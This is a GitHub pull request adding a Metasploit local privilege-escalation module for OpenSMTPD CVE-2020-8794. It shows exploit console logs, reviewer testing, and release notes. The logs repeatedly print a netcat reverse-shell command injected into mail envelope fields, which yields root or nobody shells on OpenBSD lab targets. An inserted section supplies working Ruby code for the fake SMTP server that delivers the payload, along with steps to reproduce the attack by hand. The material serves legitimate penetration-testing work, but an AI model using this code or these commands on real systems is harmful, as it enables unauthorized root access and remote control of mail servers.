Add OpenSMTPD CVE-2020-8794 LPE exploit #13003

Merged: 6 commits, Mar 4, 2020

Conversation

@wvu wvu commented Feb 27, 2020

OpenSMTPD 6.6.0 on OpenBSD 6.6

msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing

Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0

[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N]  y

OpenSMTPD 6.0.4 on OpenBSD 6.3

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

type: mda
mda-method: mda
mda-usertable: <getpwnam>
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0

[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.

id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64

#12889
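The module output above shows the whole conversation the fake SMTP server has with the target's outbound mta: greet with 220, answer EHLO with 250, and answer MAIL FROM with a multi-line 553 reply whose extra lines are envelope fields (mda-user/mda-exec under the new grammar for a root shell, the mda-usertable/mda-buffer set under the old grammar for a nobody shell). The following is an added example, not the module's code or anything from the OpenSMTPD project: a socket-free Ruby model of that server side, plus a small listener that wires it to TCP. Everything not visible in the log is an assumption and is marked as such in the comments: the names `FakeSmtp`, `envelope_lines`, `reply_553` and `serve`, the bare reply codes with no text, and CRLF line endings.

```ruby
require 'socket'

# Envelope fields to smuggle into the bounce, as the module log above prints
# them for each grammar. The command string is the attacker's; the trailing
# "exit 0" mirrors the log.
def envelope_lines(grammar, cmd)
  case grammar
  when :new # OpenSMTPD 6.6.0 in the log: the MDA runs as root
    ['dispatcher: local_mail', 'type: mda', 'mda-user: root', "mda-exec: #{cmd}; exit 0"]
  when :old # OpenSMTPD 6.0.4 in the log: the MDA runs as nobody
    ['type: mda', 'mda-method: mda', 'mda-usertable: <getpwnam>',
     'mda-user: nobody', "mda-buffer: #{cmd}; exit 0"]
  else
    raise ArgumentError, "unknown grammar #{grammar.inspect} (expected :new or :old)"
  end
end

# The multi-line 553 reply: a continuation line "553-", the terminating "553",
# an empty line, then the envelope fields. CRLF line endings are an assumption;
# the log only shows the lines.
def reply_553(grammar, cmd)
  (['553-', '553', ''] + envelope_lines(grammar, cmd)).join("\r\n") + "\r\n"
end

# Server-side state machine for the exchange in the log. It touches no socket,
# so the conversation can be driven from a test; serve() below wires it to TCP.
class FakeSmtp
  attr_reader :state

  def initialize(grammar, cmd)
    @grammar = grammar
    @cmd = cmd
    @state = :want_ehlo
  end

  # Bare reply codes with no text are an assumption; the log prints only codes.
  def greeting
    "220\r\n"
  end

  # Returns the bytes to send in response to one client line, or nil to stay
  # silent. The patterns are the ones the log shows under "Expecting:".
  def handle(line)
    line = line.chomp
    case @state
    when :want_ehlo
      return nil unless line =~ /EHLO /
      @state = :want_mail
      "250\r\n"
    when :want_mail
      return nil unless line =~ /MAIL FROM:<[^>]/
      @state = :done
      reply_553(@grammar, @cmd)
    end
  end

  def done?
    @state == :done
  end
end

# Accept one connection (port 25 is what the module listens on; binding it
# needs root), run the conversation, then disconnect as the module does.
def serve(grammar, cmd, bind = '0.0.0.0', port = 25)
  server = TCPServer.new(bind, port)
  client = server.accept
  smtp = FakeSmtp.new(grammar, cmd)
  client.write(smtp.greeting)
  until smtp.done?
    line = client.gets
    break if line.nil?
    out = smtp.handle(line)
    client.write(out) if out
  end
ensure
  client&.close
  server&.close
end
```

To reproduce the log by hand, call `serve(:new, cmd)` (or `:old` for a pre-6.4 grammar) as root on the attacker host and run the sendmail(8) command from the log on the target, with the attacker's IP in the bracketed recipient domain so the bounce is delivered to this listener. Nothing here checks the target version; the module's own check does that, and a patched OpenSMTPD will simply bounce the message without executing anything.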

@wvu wvu added the module, blocked (Blocked by one or more additional tasks), feature and needs-docs labels on Feb 27, 2020
@wvu wvu force-pushed the feature/opensmtpd branch 3 times, most recently from 921f3ed to 89e5c4c on February 27, 2020 18:11
@wvu wvu removed the needs-docs label on Feb 28, 2020
@wvu wvu marked this pull request as ready for review on February 28, 2020 16:52

wvu commented Mar 2, 2020

I'll see what I can do once the existing to-dos are finished. It may be desirable for CVE-2020-7247, too. Note that since this is a local exploit, TLS would be on the connect back to the fake SMTP server. The sendmail(8) interaction is all local to the target.

@wvu wvu force-pushed the feature/opensmtpd branch 6 times, most recently from f319607 to 96269d9 on March 3, 2020 20:24
@wvu wvu changed the title from "[WIP] Add OpenSMTPD CVE-2020-8794 LPE exploit" to "Add OpenSMTPD CVE-2020-8794 LPE exploit" on Mar 3, 2020
@wvu wvu removed the blocked (Blocked by one or more additional tasks) label on Mar 3, 2020
@wvu wvu force-pushed the feature/opensmtpd branch 2 times, most recently from 77ff255 to c5f8e49 on March 3, 2020 22:21
@wvu wvu force-pushed the feature/opensmtpd branch 4 times, most recently from fed8927 to e962dbd on March 3, 2020 23:55
@wvu wvu force-pushed the feature/opensmtpd branch 3 times, most recently from c73d6f3 to 2377729 on March 4, 2020 00:11

wvu commented Mar 4, 2020

If we add TLS support, it'll be in a subsequent PR. This bucket is full.

@space-r7 space-r7 self-assigned this Mar 4, 2020

space-r7 commented Mar 4, 2020

Tested against OpenSMTPD v6.6.0. Code LGTM:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.169:40226) at 2020-03-04 13:18:45 -0600

whoami
opensmtpd_user
background

Background session 1? [y/N]  y
msf5 exploit(multi/handler) > use exploit/unix/local/opensmtpd_oob_read_lpe 
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > check

[!] SESSION may not be compatible with this module.
[*] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25 
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'sktnbrpuuoha@[192.168.37.1]' < /dev/null && echo true
[*] Client 192.168.37.169:39706 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/pvkde; nc 192.168.37.1 4444 0</tmp/pvkde | /bin/sh >/tmp/pvkde 2>&1; rm /tmp/pvkde; exit 0

[*] Disconnecting client 192.168.37.169:39706
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.169:47937) at 2020-03-04 13:19:16 -0600
[*] Server stopped.

whoami
root
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64

@space-r7 space-r7 merged commit 5698f6e into rapid7:master Mar 4, 2020

space-r7 commented Mar 4, 2020

Release Notes

This adds a local exploit module for an out-of-bounds read vulnerability in OpenSMTPD for versions < v6.6.4. Depending on the grammar used by OpenSMTPD, an attacker can gain privileges as either root or the nobody user.


wvu commented Mar 4, 2020

Thanks so much, @space-r7! I hope it didn't take up much of your time.

@wvu wvu deleted the feature/opensmtpd branch March 5, 2020 00:52
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 16, 2020